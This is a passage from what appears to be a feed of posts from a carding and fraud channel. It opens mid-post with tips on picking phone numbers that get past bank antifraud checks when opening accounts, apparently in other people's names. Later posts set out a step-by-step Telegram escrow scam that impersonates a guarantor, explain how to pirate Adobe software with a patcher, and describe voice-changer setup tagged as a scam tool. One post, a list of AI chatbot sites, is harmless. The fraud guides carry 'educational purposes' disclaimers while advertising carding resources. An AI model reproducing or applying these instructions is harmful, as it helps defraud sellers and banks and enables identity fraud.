/&gt;By the way, some offices see much more than what is written in the bg/ownerr, so sometimes when registering two offices in a row with the same number and number, the second one can only pass by obtaining data from the database used by the antifraud, while we do not We will find this number neither in owner nor in bg.&lt;/p&gt;
  &lt;h3 id=&quot;RyUA&quot;&gt;&lt;em&gt;2. Area codes and states.&lt;/em&gt;&lt;/h3&gt;
  &lt;p id=&quot;4080&quot;&gt;In general, everything here is quite logical and there is nothing special to sort out - some banks require a number for the state without adding it to the bank, so it’s especially bad to add to this point - I’ll leave useful links below, you’ll see everything for yourself.&lt;/p&gt;
  &lt;p id=&quot;zXLE&quot;&gt;&lt;a href=&quot;https://en.wikipedia.org/wiki/List_of_area_code_overlays&quot; target=&quot;_blank&quot;&gt;*Wikipedia article with area codes*&lt;/a&gt;&lt;/p&gt;
  &lt;h3 id=&quot;71tI&quot;&gt;&lt;em&gt;3. Room type.&lt;/em&gt;&lt;/h3&gt;
  &lt;p id=&quot;2XhO&quot;&gt;In general, this is exactly the reason why, when registering with Google Voice/pings, it sends you to hell - there are databases in the public domain from which you can get information about the type of number, be it VoIP, landline (home) or wireless (mobile). Most banks declaring VoIP, some also declaring home numbers - you can check this, for example, &lt;a href=&quot;https://www.phonevalidator.com&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt; . By the way, not all numbers are VoIP on PingMe - the registrars simply change the numbers until the site issues a wireless line.&lt;/p&gt;
  &lt;h3 id=&quot;5lIA&quot;&gt;&lt;em&gt;4. The room is clogged.&lt;/em&gt;&lt;/h3&gt;
  &lt;p id=&quot;I2FK&quot;&gt;In general, I really can’t say that this parameter can actually be tracked and that it directly affects registration. But, in practice, if, for example, your office went into lock-down, then even if you change the full card, you shouldn’t change other banks to it, and in general it’s worth using 1 number with 1 full card, and if you’re fucked, how should you make a withdrawal for the same person - it’s better to change the line, because when re-registering, the old number can cause declines. Or maybe not, in any case, you can check the reputation of the number on ipqualityscore, and even if there is a warning about it, then you should definitely throw it the fuck away.&lt;/p&gt;
  &lt;p id=&quot;mSGy&quot;&gt;&lt;em&gt;Small notes that may be useful at work.&lt;/em&gt;&lt;/p&gt;
  &lt;ul id=&quot;a3J4&quot;&gt;
    &lt;li id=&quot;AKtB&quot;&gt;When using numbers from the textverified site and similar sites that use the same provider (by the way, there are really a lot of them and they all have different prices, well, by the way), rentals for multiservice do not accept numbers from some banks - in this case, you can use rentals for a specific the bank is there.&lt;/li&gt;
    &lt;li id=&quot;ktJo&quot;&gt;When working with banks that do not send 2FA to the number at the time of registration, you can indicate the holder’s number, and then add yours to the account/enroll - depending on the bank.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;i2QM&quot; data-align=&quot;center&quot;&gt;&lt;em&gt;Useful links for information about rooms:&lt;/em&gt;&lt;/p&gt;
  &lt;p id=&quot;RuR2&quot; data-align=&quot;right&quot;&gt;&lt;a href=&quot;https://www.ipqualityscore.com/phone-number-validator&quot; target=&quot;_blank&quot;&gt;&lt;em&gt;IPQualityScore Phone Number Validation - most information about the number&lt;/em&gt;&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;WEye&quot; data-align=&quot;right&quot;&gt;&lt;a href=&quot;https://www.phonevalidator.com&quot; target=&quot;_blank&quot;&gt;&lt;em&gt;Phone Validator - landline/wireless/voip + state&lt;/em&gt;&lt;/a&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;PQbz&quot;&gt;Well, something like this. Let me remind you once again that this is not a universal recommendation for working with banks/vcc, but rather a certain set of information that they may request. Even in 2023, there are companies that frankly don’t give a fuck and they even refuse voips (even though there are very few of them), and most of the undeveloped banks don’t give a fuck about staff/cr and so on. To say the least, profits for everyone and easy registrations. &lt;a href=&quot;https://t.me/+9ZtRfQpkD84zNzdh&quot; target=&quot;_blank&quot;&gt;HACKFREAKS &lt;/a&gt;was with you as always . &lt;em&gt;Peace.&lt;/em&gt;&lt;/blockquote&gt;

</content></entry><entry><id>hackfreaks:Fzs7ixgI-Qj</id><link rel="alternate" type="text/html" href="https://teletype.in/@hackfreaks/Fzs7ixgI-Qj?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hackfreaks"></link><title>List of projects to replace ChatGPT.</title><published>2023-11-13T21:36:54.882Z</published><updated>2023-11-13T21:36:54.882Z</updated><summary type="html">Without registering:</summary><content type="html">
  &lt;p id=&quot;Prij&quot;&gt;Without registering:&lt;/p&gt;
  &lt;p id=&quot;1igu&quot;&gt;1. Perplexity AI [ &lt;a href=&quot;https://www.perplexity.ai/&quot; target=&quot;_blank&quot;&gt;https://www.perplexity.ai/&lt;/a&gt; ] (web-browsing)&lt;/p&gt;
  &lt;p id=&quot;DOQp&quot;&gt;2. Vitalentum [ &lt;a href=&quot;https://vitalentum.net/free-gpt&quot; target=&quot;_blank&quot;&gt;https://vitalentum.net/free-gpt&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;GMza&quot;&gt;3. Vicuna [ &lt;a href=&quot;https://chat.lmsys.org/&quot; target=&quot;_blank&quot;&gt;https://chat.lmsys.org/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;4cB0&quot;&gt;4. GPTGO [ &lt;a href=&quot;https://gptgo.ai/&quot; target=&quot;_blank&quot;&gt;https://gptgo.ai/&lt;/a&gt; ] (web-browsing)&lt;/p&gt;
  &lt;p id=&quot;lb99&quot;&gt;5. AnonChatGPT [ &lt;a href=&quot;https://anonchatgpt.com/&quot; target=&quot;_blank&quot;&gt;https://anonchatgpt.com/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;j0Q5&quot;&gt;6. NoowAI [ &lt;a href=&quot;https://noowai.com/&quot; target=&quot;_blank&quot;&gt;https://noowai.com/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;NLlx&quot;&gt;7. Character AI [ &lt;a href=&quot;https://beta.character.ai/&quot; target=&quot;_blank&quot;&gt;https://beta.character.ai/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;2nyg&quot;&gt;8. BAI Chat [ &lt;a href=&quot;https://chatbot.theb.ai/&quot; target=&quot;_blank&quot;&gt;https://chatbot.theb.ai/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;GzP7&quot;&gt;9. iAsk AI [ &lt;a href=&quot;https://iask.ai/&quot; target=&quot;_blank&quot;&gt;https://iask.ai/&lt;/a&gt; ] (web-browsing)&lt;/p&gt;
  &lt;p id=&quot;pWz9&quot;&gt;10. Phind AI [ &lt;a href=&quot;https://www.phind.com/&quot; target=&quot;_blank&quot;&gt;https://www.phind.com/&lt;/a&gt; ] (web-browsing)&lt;/p&gt;
  &lt;p id=&quot;gO8H&quot;&gt;11. GPT4All [ &lt;a href=&quot;https://gpt4all.io/index.html&quot; target=&quot;_blank&quot;&gt;https://gpt4all.io/index.html&lt;/a&gt; ] (open-source)&lt;/p&gt;
  &lt;p id=&quot;XeD9&quot;&gt;12. DeepAI Chat [ &lt;a href=&quot;https://deepai.org/chat&quot; target=&quot;_blank&quot;&gt;https://deepai.org/chat&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;FTLb&quot;&gt;13. Teach Anything [ &lt;a href=&quot;https://www.teach-anything.com/&quot; target=&quot;_blank&quot;&gt;https://www.teach-anything.com/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;0G68&quot;&gt;With registration:&lt;/p&gt;
  &lt;p id=&quot;mhlJ&quot;&gt;14. Poe AI [ &lt;a href=&quot;https://poe.com/ChatGPT&quot; target=&quot;_blank&quot;&gt;https://poe.com/ChatGPT&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;FWwm&quot;&gt;15. Bard &lt;a href=&quot;https://bard.google.com/?authuser=0&quot; target=&quot;_blank&quot;&gt;[https://bard.google.com/]&lt;/a&gt; (web-browsing)&lt;/p&gt;
  &lt;p id=&quot;k1Gs&quot;&gt;16. Easy-Peasy AI [ &lt;a href=&quot;https://easy-peasy.ai/&quot; target=&quot;_blank&quot;&gt;https://easy-peasy.ai/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;Jknm&quot;&gt;17. Forefront AI [ &lt;a href=&quot;https://chat.forefront.ai/&quot; target=&quot;_blank&quot;&gt;https://chat.forefront.ai/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;PI85&quot;&gt;18. OraChat [ &lt;a href=&quot;https://ora.ai/chatbot-master/openai-chatgpt-chatbot&quot; target=&quot;_blank&quot;&gt;https://ora.ai/chatbot-master/openai-chatgpt-chatbot&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;lz8a&quot;&gt;19. HuggingChat [ &lt;a href=&quot;https://huggingface.co/chat&quot; target=&quot;_blank&quot;&gt;https://huggingface.co/chat&lt;/a&gt; ] (web-browsing)&lt;/p&gt;
  &lt;p id=&quot;235D&quot;&gt;20. WriteSonic [ &lt;a href=&quot;https://app.writesonic.com/chat&quot; target=&quot;_blank&quot;&gt;https://app.writesonic.com/chat&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;6uZn&quot;&gt;21. FlowGPT [ &lt;a href=&quot;https://flowgpt.com/chat&quot; target=&quot;_blank&quot;&gt;https://flowgpt.com/chat&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;tz3M&quot;&gt;22. Sincode AI [ &lt;a href=&quot;https://www.sincode.ai/&quot; target=&quot;_blank&quot;&gt;https://www.sincode.ai/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;Mjpv&quot;&gt;23. &lt;a href=&quot;http://AI.LS/&quot; target=&quot;_blank&quot;&gt;AI.LS&lt;/a&gt; [ &lt;a href=&quot;https://ai.ls/&quot; target=&quot;_blank&quot;&gt;https://ai.ls/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;ktZl&quot;&gt;24. LetsView Chat [ &lt;a href=&quot;https://letsview.com/chatbot&quot; target=&quot;_blank&quot;&gt;https://letsview.com/chatbot&lt;/a&gt; ] (free only 10 messages)&lt;/p&gt;
  &lt;p id=&quot;FrGX&quot;&gt;25. CapeChat [ &lt;a href=&quot;https://chat.capeprivacy.com/&quot; target=&quot;_blank&quot;&gt;https://chat.capeprivacy.com/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;Ghf5&quot;&gt;26. Open-Assistant [ &lt;a href=&quot;https://open-assistant.io/&quot; target=&quot;_blank&quot;&gt;https://open-assistant.io/&lt;/a&gt; ] (open-source)&lt;/p&gt;
  &lt;p id=&quot;Y1Ip&quot;&gt;27. GlobalGPT [ &lt;a href=&quot;https://www.globalgpt.nspiketech.com/&quot; target=&quot;_blank&quot;&gt;https://www.globalgpt.nspiketech.com/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;emjc&quot;&gt;28. Bing Chat &lt;a href=&quot;http://bing.com/chat&quot; target=&quot;_blank&quot;&gt;[bing.com/chat]&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;xfkM&quot;&gt;29. JimmyGPT [ &lt;a href=&quot;https://www.jimmygpt.com/&quot; target=&quot;_blank&quot;&gt;https://www.jimmygpt.com/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;5PlS&quot;&gt;30. Codeium [ &lt;a href=&quot;https://codeium.com/&quot; target=&quot;_blank&quot;&gt;https://codeium.com/&lt;/a&gt; ] (mainly for programming)&lt;/p&gt;
  &lt;p id=&quot;4pVY&quot;&gt;31. YouChat &lt;a href=&quot;http://you.com/chat&quot; target=&quot;_blank&quot;&gt;[you.com/chat]&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;hFqw&quot;&gt;32. Frank AI [ &lt;a href=&quot;https://franks.ai/&quot; target=&quot;_blank&quot;&gt;https://franks.ai/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;MZ3q&quot;&gt;33. OpenAI Playground &lt;a href=&quot;http://platform.openai.com/playground&quot; target=&quot;_blank&quot;&gt;[platform.openai.com/playground]&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;1nia&quot;&gt;To write blog articles (with a chatbot):&lt;/p&gt;
  &lt;p id=&quot;fhxr&quot;&gt;34. Copy AI [ &lt;a href=&quot;https://app.copy.ai/&quot; target=&quot;_blank&quot;&gt;https://app.copy.ai/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;gwud&quot;&gt;35. TextCortex AI [ &lt;a href=&quot;https://app.textcortex.com/&quot; target=&quot;_blank&quot;&gt;https://app.textcortex.com/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;IEmU&quot;&gt;36. Marmof [ &lt;a href=&quot;https://app.marmof.com/&quot; target=&quot;_blank&quot;&gt;https://app.marmof.com/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;krHY&quot;&gt;37. HyperWrite [ &lt;a href=&quot;https://app.hyperwriteai.com/chatbot&quot; target=&quot;_blank&quot;&gt;https://app.hyperwriteai.com/chatbot&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;Kqhe&quot;&gt;38. WriterX [ &lt;a href=&quot;https://app.writerx.co/&quot; target=&quot;_blank&quot;&gt;https://app.writerx.co/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;tggJ&quot;&gt;To work with files (PDF, etc.):&lt;/p&gt;
  &lt;p id=&quot;AK1L&quot;&gt;39. AnySummary [ &lt;a href=&quot;https://www.anysummary.app/&quot; target=&quot;_blank&quot;&gt;https://www.anysummary.app/&lt;/a&gt; ] (3 per day)&lt;/p&gt;
  &lt;p id=&quot;qJ9x&quot;&gt;40. Sharly AI [ &lt;a href=&quot;https://app.sharly.ai/&quot; target=&quot;_blank&quot;&gt;https://app.sharly.ai/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;WlCh&quot;&gt;41. Documind [ &lt;a href=&quot;https://www.documind.chat/&quot; target=&quot;_blank&quot;&gt;https://www.documind.chat/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;VkZY&quot;&gt;42. ChatDOC [ &lt;a href=&quot;https://chatdoc.com/&quot; target=&quot;_blank&quot;&gt;https://chatdoc.com/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;xZOJ&quot;&gt;43. Humata AI [ &lt;a href=&quot;https://app.humata.ai/&quot; target=&quot;_blank&quot;&gt;https://app.humata.ai/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;Jz12&quot;&gt;44. Ask Your PDF [ &lt;a href=&quot;https://askyourpdf.com/&quot; target=&quot;_blank&quot;&gt;https://askyourpdf.com/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;75Nv&quot;&gt;45. ChatPDF [ &lt;a href=&quot;https://www.chatpdf.com/&quot; target=&quot;_blank&quot;&gt;https://www.chatpdf.com/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;1tUK&quot;&gt;46. ​​FileGPT [ &lt;a href=&quot;https://filegpt.app/chat&quot; target=&quot;_blank&quot;&gt;https://filegpt.app/chat&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;g9Gl&quot;&gt;47. ResearchAide [ &lt;a href=&quot;https://www.researchaide.org/&quot; target=&quot;_blank&quot;&gt;https://www.researchaide.org/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;yezG&quot;&gt;48. Pensieve AI [ &lt;a href=&quot;https://pensieve-app.springworks.in/&quot; target=&quot;_blank&quot;&gt;https://pensieve-app.springworks.in/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;JEFm&quot;&gt;49. Docalysis [ &lt;a href=&quot;https://docalysis.com/&quot; target=&quot;_blank&quot;&gt;https://docalysis.com/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;bHBZ&quot;&gt;The best chatbot assistants:&lt;/p&gt;
  &lt;p id=&quot;PTcw&quot;&gt;1. Pi, your personal AI [ &lt;a href=&quot;https://heypi.com/talk&quot; target=&quot;_blank&quot;&gt;https://heypi.com/talk&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;tgv3&quot;&gt;2. Kuki AI [ &lt;a href=&quot;https://chat.kuki.ai/&quot; target=&quot;_blank&quot;&gt;https://chat.kuki.ai/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;MGi0&quot;&gt;3. Replika [ &lt;a href=&quot;https://replika.com/&quot; target=&quot;_blank&quot;&gt;https://replika.com/&lt;/a&gt; ]&lt;/p&gt;
  &lt;p id=&quot;upQi&quot;&gt;4. YourHana AI &lt;a href=&quot;https://yourhana.ai/chat&quot; target=&quot;_blank&quot;&gt;[https://yourhana.ai/]&lt;/a&gt;&lt;/p&gt;

</content></entry><entry><id>hackfreaks:s8jAZMCcQG4</id><link rel="alternate" type="text/html" href="https://teletype.in/@hackfreaks/s8jAZMCcQG4?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hackfreaks"></link><title>Guarantor/Escrow Scam</title><published>2023-09-21T13:13:26.610Z</published><updated>2023-09-21T13:13:26.610Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img3.teletype.in/files/60/27/60272b27-bda9-477d-8563-a5f1511ba3fb.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img2.teletype.in/files/14/e1/14e18596-ee28-4cf5-adbe-ac988c5e0bf9.jpeg&quot;&gt;Hello freaks Sup👋. Today in Hackfreaks we'll see how they do this kinda scam. ⚠️Sharing this strictly for educational purposes only. please don't misuse it.</summary><content type="html">
  &lt;figure id=&quot;JM78&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/14/e1/14e18596-ee28-4cf5-adbe-ac988c5e0bf9.jpeg&quot; width=&quot;1200&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;oLsL&quot;&gt;Hello freaks Sup👋. Today in Hackfreaks we&amp;#x27;ll see how they do this kinda scam. ⚠️Sharing this strictly for educational purposes only. please don&amp;#x27;t misuse it.&lt;/p&gt;
  &lt;h2 id=&quot;TnCW&quot;&gt;Instructions:&lt;/h2&gt;
  &lt;p id=&quot;xjoa&quot;&gt;1) First, let&amp;#x27;s choose who and what we will scam.&lt;/p&gt;
  &lt;p id=&quot;W9As&quot;&gt;2) After choosing, we write that we are ready to deal with the guarantor.&lt;/p&gt;
  &lt;p id=&quot;OXAQ&quot;&gt;3) This is important! We create a group (namely we) and add a seller and a guarantor.&lt;/p&gt;
  &lt;p id=&quot;E28s&quot;&gt;4) As soon as the guarantor writes the payment details, we begin to stall for time, for example: “I&amp;#x27;ll exchange the cue ball now, wait 10-20 minutes.”&lt;/p&gt;
  &lt;p id=&quot;ykV8&quot;&gt;5) At this stage, we quickly make a copy of the guarantor&amp;#x27;s account.&lt;/p&gt;
  &lt;p id=&quot;e18H&quot;&gt;6) Now we remove the real guarantor from the group, and add the newly created copy of the guarantor&amp;#x27;s account, and delete the SMS about deletion and joining.&lt;/p&gt;
  &lt;p id=&quot;IKhE&quot;&gt;7) There are already two ways here: either the seller will detect a fake, or he will not notice anything. If he didn&amp;#x27;t notice, then we write on behalf of the guarantor that payment has been received, and the seller must discard the goods.&lt;/p&gt;
  &lt;p id=&quot;Q42g&quot;&gt;🔥 &lt;strong&gt;&lt;a href=&quot;https://t.me/cashoutdump&quot; target=&quot;_blank&quot;&gt;Stop suffering with bullshit, it&amp;#x27;s time to earn money with Hackfreaks Team&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;h3 id=&quot;hEJj&quot;&gt;&lt;strong&gt;PROFITS TO ALL 💎&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;kja9&quot;&gt;&lt;a href=&quot;https://t.me/+9ZtRfQpkD84zNzdh&quot; target=&quot;_blank&quot;&gt;HACKFREAKS OFFICIAL&lt;/a&gt; - LIST OF CARDING RESOURCES, CHANNEL WITH TOPICS, CHAT FOR COMMUNICATION, BOARD WITH TRUST SELLERS AND MARKETPLACE FOR THEIR ADVERTISING 🤙🏿&lt;/p&gt;

</content></entry><entry><id>hackfreaks:32BswoRrItM</id><link rel="alternate" type="text/html" href="https://teletype.in/@hackfreaks/32BswoRrItM?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hackfreaks"></link><title>How to download any program from adobe for free</title><published>2023-08-23T19:30:02.574Z</published><updated>2023-09-13T08:42:42.289Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img1.teletype.in/files/4e/73/4e731412-f176-4a67-9e43-d2b5fa31dd82.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img3.teletype.in/files/ed/75/ed756515-761c-4d67-a828-fada77663675.jpeg&quot;&gt;We get adobe programs for free!</summary><content type="html">
  &lt;figure id=&quot;1oMt&quot; class=&quot;m_retina&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/ed/75/ed756515-761c-4d67-a828-fada77663675.jpeg&quot; width=&quot;1280&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;9R20&quot;&gt;We get adobe programs for free!&lt;/p&gt;
  &lt;blockquote id=&quot;S6Yq&quot;&gt;The article is educational in nature, we do not call for anything and do not oblige. The information is presented for informational purposes only.&lt;/blockquote&gt;
  &lt;h4 id=&quot;More-interesting-articles-on-our-forum:-https://zelenka.guru/articles/&quot;&gt;&lt;a href=&quot;https://t.me/+wmk-VJwe8OxmZTlh&quot; target=&quot;_blank&quot;&gt;More interesting articles on our channel: Hackfreaks Official&lt;/a&gt;&lt;/h4&gt;
  &lt;h4 id=&quot;Subscribe-to-the-channel-and-share-the-link-to-the-article-with-your-friends!&quot;&gt;Subscribe to the channel and share the link to the article with your friends!&lt;/h4&gt;
  &lt;h2 id=&quot;isVS&quot;&gt;&lt;strong&gt;start :&lt;/strong&gt;&lt;/h2&gt;
  &lt;p id=&quot;gvsw&quot;&gt;First of all: go to the adobe creative cloud website and download it:&lt;/p&gt;
  &lt;ul id=&quot;M2Z3&quot;&gt;
    &lt;li id=&quot;7QZE&quot;&gt;&lt;strong&gt;https://creativecloud.adobe.com/apps/download/creative-cloud&lt;/strong&gt;&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;o1oO&quot;&gt;&lt;strong&gt;Point 2&lt;/strong&gt; - downloading the applications you need.&lt;/p&gt;
  &lt;figure id=&quot;ur7l&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://lztcdn.com/files/1a2d9389-ff8a-4623-bdf7-ce71850c45d7.webp&quot; width=&quot;1048&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;p0Gh&quot;&gt;You will have them for 7 days for free, but in this guide we will get them forever.&lt;/p&gt;
  &lt;p id=&quot;1NQR&quot;&gt;After downloading the programs, go to github and download the keygen.&lt;/p&gt;
  &lt;ul id=&quot;mlKQ&quot;&gt;
    &lt;li id=&quot;bfBj&quot;&gt;&lt;a href=&quot;https://github.com/cw2k/Adobe-GenP&quot; target=&quot;_blank&quot;&gt;https://github.com/cw2k/Adobe-GenP&lt;/a&gt;&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;Vkfl&quot;&gt;&lt;strong&gt;Point 3 - flashing for a license. &lt;/strong&gt;Open this program:&lt;/p&gt;
  &lt;figure id=&quot;uRdf&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://lztcdn.com/files/62f919ec-a003-4693-9883-4279b858a256.webp&quot; width=&quot;586&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;WdQ5&quot;&gt;We press search and it searches for all adobe programs:&lt;/p&gt;
  &lt;figure id=&quot;qRJp&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://lztcdn.com/files/ed493470-9bf7-4367-830a-e57e95d38e06.webp&quot; width=&quot;559&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;p04T&quot;&gt;After we found it, we press the patch and you now have all the programs with a license!&lt;/p&gt;
  &lt;h4 id=&quot;That&amp;#x27;s-all.-good-luck!&quot;&gt;That&amp;#x27;s all. good luck!&lt;/h4&gt;

</content></entry><entry><id>hackfreaks:8XZeMF-EWN3</id><link rel="alternate" type="text/html" href="https://teletype.in/@hackfreaks/8XZeMF-EWN3?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hackfreaks"></link><title>(SCAM)Making a realistic female voice in real time.</title><published>2023-08-17T14:06:17.756Z</published><updated>2023-08-17T14:13:24.607Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img4.teletype.in/files/74/0f/740fc0a7-a9e6-4047-a516-ebd3e1892700.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img1.teletype.in/files/ca/e1/cae15f0e-8d75-40c1-a404-8e7cbe6b81ab.png&quot;&gt;Making a realistic female voice in real time.</summary><content type="html">
  &lt;figure id=&quot;Lmpw&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/ca/e1/cae15f0e-8d75-40c1-a404-8e7cbe6b81ab.png&quot; width=&quot;1000&quot; /&gt;
  &lt;/figure&gt;
  &lt;h4 id=&quot;Making-a-female-voice!&quot;&gt;Making a female voice!&lt;/h4&gt;
  &lt;blockquote id=&quot;OMrx&quot;&gt;The article is educational in nature, we do not call for anything and do not oblige. The information is presented for informational purposes only.&lt;/blockquote&gt;
  &lt;h4 id=&quot;More-interesting-articles-on-our-forum:-https://zelenka.guru/articles/&quot;&gt;&lt;a href=&quot;https://t.me/+wmk-VJwe8OxmZTlh&quot; target=&quot;_blank&quot;&gt;More interesting articles on our forum: Hackfreaks Official&lt;/a&gt;&lt;/h4&gt;
  &lt;h4 id=&quot;Subscribe-to-the-channel-and-share-the-link-to-the-article-with-your-friends!&quot;&gt;Subscribe to the channel and share the link to the article with your friends!&lt;/h4&gt;
  &lt;p id=&quot;cBA0&quot;&gt;&lt;strong&gt;Introduction&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;Up1K&quot;&gt;To begin with, we need a medium-powerful video card, on a weak video card there will be &lt;em&gt;a large delay.&lt;/em&gt;&lt;/p&gt;
  &lt;p id=&quot;f3wj&quot;&gt;&lt;strong&gt;What will be required&lt;/strong&gt; ?&lt;/p&gt;
  &lt;p id=&quot;qQP7&quot;&gt;The program itself, download link and tutorial below:&lt;/p&gt;
  &lt;ul id=&quot;oiWl&quot;&gt;
    &lt;li id=&quot;3dZB&quot;&gt;&lt;a href=&quot;https://github.com/w-okada/voice-changer&quot; target=&quot;_blank&quot;&gt;https://github.com/w-okada/voice-changer&lt;/a&gt;&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;sobA&quot;&gt;&lt;strong&gt;Download tutorial:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;kHJd&quot;&gt;On the site that opens, scroll down and click on Hugging face as in the screenshot:&lt;/p&gt;
  &lt;figure id=&quot;1FYA&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://lztcdn.com/files/8b18993704afc20c9f3db0c4c105abc565cc67f1dfa88191d9a3cbbf224dd323.webp&quot; width=&quot;1541&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;bTAJ&quot;&gt;Next, we see a bunch of files:&lt;/p&gt;
  &lt;figure id=&quot;igIy&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://lztcdn.com/files/e8fabf4eb3683a35b95ee81a653751af9bca99779249bd49b7871a07ebc2a69e.webp&quot; width=&quot;1534&quot; /&gt;
  &lt;/figure&gt;
  &lt;blockquote id=&quot;VJRH&quot;&gt;If you have a poppy, then download the poppy version.&lt;/blockquote&gt;
  &lt;blockquote id=&quot;AYEU&quot;&gt;If you have an AMD video card, then download the onnxDirectML version (the newest one)&lt;/blockquote&gt;
  &lt;blockquote id=&quot;6XiG&quot;&gt;If you have an Nvidia graphics card, then download the onnxgpu version (the newest one)&lt;/blockquote&gt;
  &lt;p id=&quot;hz3X&quot;&gt;&lt;strong&gt;Installation&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;WqCk&quot;&gt;Unpack the archive and look for the file &amp;quot; &lt;strong&gt;start_http.bat&amp;quot; in the folder and run it.&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;3neh&quot;&gt;You will start downloading files and eventually the panel will start:&lt;/p&gt;
  &lt;figure id=&quot;2qqe&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://lztcdn.com/files/c8df38755bcfe9877b542f86ac780d587c82fe1066f9625224f54d9fbe08711e.webp&quot; width=&quot;835&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;5tgE&quot;&gt;​To output sound from the program, we need &lt;strong&gt;a virtual audio cable (VAC) Virtual Audio Cable.&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;k2MK&quot;&gt;
    &lt;li id=&quot;xHtu&quot;&gt;&lt;a href=&quot;https://drive.google.com/file/d/1G4_9XM2HKj-ZUPp1mFjY8dkHDZE7TVTJ/view&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;drive.google.com&lt;/strong&gt;&lt;/a&gt;&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;ee6C&quot;&gt;It is not necessary to unpack the archive; to install, run this file:&lt;/p&gt;
  &lt;figure id=&quot;WIe4&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://lztcdn.com/files/9fae5a41c1b70aa37a8d81be37d1690e61d0560df852c2360ee4dc98e0b5825c.webp&quot; width=&quot;601&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Dl6Z&quot;&gt;In the installer, we wait everywhere further and agree with everything.&lt;/p&gt;
